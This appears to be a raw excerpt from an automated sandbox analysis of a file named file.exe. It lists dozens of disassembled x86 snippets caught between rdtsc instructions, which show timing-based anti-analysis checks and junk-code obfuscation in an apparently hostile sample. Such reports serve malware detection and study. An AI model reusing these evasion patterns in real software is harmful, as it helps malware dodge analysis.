                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB274C second address: FB2783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4B9132D696h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F4B9132D69Bh 0x00000015 jng 00007F4B9132D69Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d jbe 00007F4B9132D696h 0x00000023 jns 00007F4B9132D696h 0x00000029 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB28CA second address: FB28D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB28D0 second address: FB2901 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 jo 00007F4B9132D69Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jbe 00007F4B9132D6B9h 0x00000018 jmp 00007F4B9132D69Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 jns 00007F4B9132D696h 0x00000027 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2901 second address: FB2905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2D4E second address: FB2D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4B9132D696h 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2D58 second address: FB2D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2ED5 second address: FB2EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2EE0 second address: FB2EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2EE6 second address: FB2EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2EEA second address: FB2EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2EEE second address: FB2EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2EF4 second address: FB2F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F4B90BE6236h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB3B9 second address: FAB3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB3BD second address: FAB3C7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB3C7 second address: FAB3CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB3CD second address: FAB3D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB389E second address: FB38DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4B9132D6A5h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F4B9132D69Dh 0x00000012 jmp 00007F4B9132D6A5h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3D7B second address: FB3D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3D81 second address: FB3D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3D8A second address: FB3DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6232h 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3DA0 second address: FB3DA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB96A5 second address: FB96A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9B62 second address: FB9B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F82165 second address: F82174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F4B90BE6226h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1CD1 second address: FC1CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4B9132D696h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1CE0 second address: FC1CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1CE6 second address: FC1CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1CEA second address: FC1CEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1CEE second address: FC1CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1CFC second address: FC1D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F4B90BE622Eh 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1133 second address: FC1143 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4B9132D696h 0x00000008 jnc 00007F4B9132D696h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1143 second address: FC1148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3BA3 second address: FC3BAD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4B9132D69Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3CBC second address: FC3CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC3F65 second address: FC3F6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC405A second address: FC4068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F4B90BE6226h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4887 second address: FC488D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4941 second address: FC4945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4D4B second address: FC4D50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4D50 second address: FC4D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4B90BE6233h 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4E6E second address: FC4E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4E73 second address: FC4E7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F83CE2 second address: F83CFB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F4B9132D69Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F4B9132D696h 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F83CFB second address: F83D11 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F83D11 second address: F83D3C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4B9132D6A7h 0x0000000f jmp 00007F4B9132D69Ah 0x00000014 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F83D3C second address: F83D5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6237h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC699F second address: FC6A0C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F4B9132D698h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov esi, ecx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F4B9132D698h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 mov si, A6D6h 0x0000004a mov si, bx 0x0000004d push 00000000h 0x0000004f mov dword ptr [ebp+124799F8h], esi 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 jp 00007F4B9132D696h 0x0000005f push eax 0x00000060 pop eax 0x00000061 popad 0x00000062 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC73E2 second address: FC73FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B90BE6234h 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC73FA second address: FC7465 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F4B9132D698h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D3870h], ebx 0x00000029 push 00000000h 0x0000002b cmc 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F4B9132D698h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 je 00007F4B9132D697h 0x0000004e stc 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push edi 0x00000053 jng 00007F4B9132D696h 0x00000059 pop edi 0x0000005a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7465 second address: FC746A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7CBF second address: FC7CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9DD7 second address: FC9DDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCA800 second address: FCA860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4B9132D696h 0x0000000a popad 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D2FC8h], edi 0x00000012 clc 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F4B9132D698h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f pushad 0x00000030 or dword ptr [ebp+122D2FCDh], ebx 0x00000036 or dword ptr [ebp+122D2D9Bh], ecx 0x0000003c popad 0x0000003d push 00000000h 0x0000003f movsx esi, si 0x00000042 mov dword ptr [ebp+122D3870h], edi 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jbe 00007F4B9132D69Ch 0x00000051 jg 00007F4B9132D696h 0x00000057 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC28C second address: FCC2B0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4B90BE6238h 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F749FC second address: F74A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F74A00 second address: F74A0C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4B90BE6226h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F74A0C second address: F74A32 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4B9132D6B1h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F74A32 second address: F74A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC8F9 second address: FCC8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC8FD second address: FCC901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC901 second address: FCC90B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC90B second address: FCC90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC90F second address: FCC937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4B9132D69Ch 0x00000012 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD1343 second address: FD1348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD1348 second address: FD13C3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4B9132D698h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F4B9132D6A2h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F4B9132D698h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 movzx ebx, di 0x00000038 mov edi, dword ptr [ebp+122D2AE8h] 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007F4B9132D698h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 00000014h 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jns 00007F4B9132D696h 0x00000067 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCE680 second address: FCE684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD13C3 second address: FD13C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD13C9 second address: FD13CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD444F second address: FD4455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD4455 second address: FD449B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jp 00007F4B90BE6226h 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 mov ebx, dword ptr [ebp+122D2CF0h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F4B90BE6228h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 clc 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b pop eax 0x0000003c rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD3737 second address: FD373C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD54E4 second address: FD54EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD54EE second address: FD556A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F4B9132D698h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 pushad 0x00000026 cld 0x00000027 sbb ecx, 18F931C8h 0x0000002d popad 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D2C00h] 0x00000036 xchg eax, esi 0x00000037 pushad 0x00000038 jne 00007F4B9132D69Ch 0x0000003e je 00007F4B9132D6AAh 0x00000044 jmp 00007F4B9132D6A4h 0x00000049 popad 0x0000004a push eax 0x0000004b pushad 0x0000004c pushad 0x0000004d jmp 00007F4B9132D6A4h 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6514 second address: FD6518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD73C0 second address: FD73C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD73C4 second address: FD7441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jns 00007F4B90BE6229h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F4B90BE6228h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F4B90BE6228h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 xchg eax, esi 0x00000049 jmp 00007F4B90BE6239h 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD67D5 second address: FD67D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD7441 second address: FD7447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD820A second address: FD820E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD756E second address: FD759F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6238h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4B90BE6232h 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD759F second address: FD75A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD75A5 second address: FD75A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD8346 second address: FD834A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD834A second address: FD8362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F4B90BE622Ch 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
